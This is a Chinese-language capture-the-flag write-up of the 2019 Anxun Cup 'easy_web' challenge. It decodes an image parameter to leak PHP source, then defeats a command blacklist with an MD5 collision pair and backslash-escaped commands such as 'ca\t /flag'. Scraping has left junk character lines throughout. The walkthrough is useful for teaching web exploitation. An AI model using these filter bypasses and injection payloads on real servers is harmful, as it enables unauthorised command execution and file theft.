[安洵杯 2019]easy_web

admin

+ [- G( J( w. a2 Y" {5 e# x: f<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>&nbsp;</p>
; h+ S+ J$ T; \4 I<p>&nbsp;</p>
<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
9 A+ `0 x- S. U2 b8 A+ G( w  b<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
6 M5 w  O* Z. p0 k<p>&nbsp;</p>
0 U; A. s" }) b8 S* j2 a9 H' D" d<p>&nbsp;</p>
<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>&nbsp;</p>
+ @  ~; a9 l% [& C7 V* @$ J<p>&nbsp;</p>
$ Y( G7 ?/ c7 h/ k' G<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
) R0 |7 `0 a7 S0 D: i<p>&nbsp;</p>
4 J$ N, d+ p7 E( x# ?2 ~3 B8 s& X<p>&nbsp;</p>
( y) q  U" p# ^9 I<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
- K& z$ \+ z# W7 h<pre class="brush:sql;gutter:true;">555.png
7 o1 W$ |, G; F7 ]; k0 I! `</pre>
</div>
! h, g7 O. \3 C9 N<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
5 Y. k" L& `4 d1 ~* c</pre>
) u* K3 b1 |* R3 I- N3 q</div>
<p>　　然后输入到地址栏</p>
<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
: z) v! H; z' }, b+ x! W4 N# k</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
  [( Y- S4 i+ o4 d# V; Y; w+ M</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
7 R8 _, u8 f" d/ J    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));

</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
. v7 t% [6 c' h2 e+ g( @4 U; R    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
- `2 Z" v$ k) H) Q+ ?: w/ C2 d2 ?    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
8 g3 j) v9 C: Q) O2 d    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
, @2 f& P5 _+ O8 ]2 I+ T. F</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
3 ?9 j7 ?' }7 o3 k( }$ J        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
1 p. E# i# N0 Q1 j' }+ G    }
/ `7 `+ P+ K1 i- q: A% m* W}

</span>?&gt;
7 h9 W! F3 g5 U# \&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
) E4 `2 l" ^" |+ S" \+ d* k  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
" L6 {1 N: u) j# {5 n) _: {   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
9 a  l0 F. q2 x  a0 j$ Z   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
6 e5 L3 m. R; t: l' B   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
+ M+ _: e; p4 x  w. d3 j2 ~2 @9 S<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
/ l" g9 @& R* G0 n( S2 S&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
) T( E; J2 n4 i+ E9 t) l: Z% r4 B<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
/ Z1 b! S8 [; {" |5 V    }</span></pre>
+ {' |' G) M% R8 v; ]</div>
<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
" ?/ S0 ^( F5 c& V( \) p! V</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
9 g, d) q# n  E7 L</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
<p>于是采用payload:</p>
1 b% u# R2 e0 z0 U<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
1 o/ V/ o: P' _; w2 l<p>&nbsp;</p>
" M- T- v; A3 G" j! @$ h. `* X<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
<p>ls和l\s在命令执行的时候结果是一样的。</p>
: u; w+ _: ]5 N<p>然后发现根目录里面有/flag</p>
<p>于是payload:</p>
; m, o! d. d" w9 Z; N# F<div class="cnblogs_Highlighter">
) d7 l' F! C7 _2 l- d( }8 e" [<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
  g7 N7 \. s/ m& x+ K9 Z</pre>
* }1 O1 _, G2 _' R' X</div>
9 j3 d. `5 e% ^: a0 J0 [" G<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
<p>&nbsp;</p>
0 w& {, p7 K" r7 I7 \